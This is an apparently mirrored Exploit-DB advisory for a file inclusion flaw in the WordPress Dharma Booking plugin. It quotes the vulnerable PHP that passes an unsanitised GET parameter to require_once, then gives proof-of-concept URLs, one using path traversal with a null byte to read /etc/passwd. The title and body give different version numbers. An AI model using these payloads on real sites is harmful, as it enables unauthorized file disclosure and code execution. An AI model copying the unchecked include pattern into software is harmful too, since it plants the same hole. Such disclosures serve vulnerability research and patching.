WordPress Plugin Dharma Booking 2.38.3 – Remote File Inclusion - 体验盒子

作者： AMAR^SHG

日期： 2016-03-22

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/39592/

# Exploit Title: WordPress Dharma booking File Inclusion

# Date: 03/22/2016

# Exploit Author: AMAR^SHG

# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/

<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/

# Version: <=2.28.3

# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00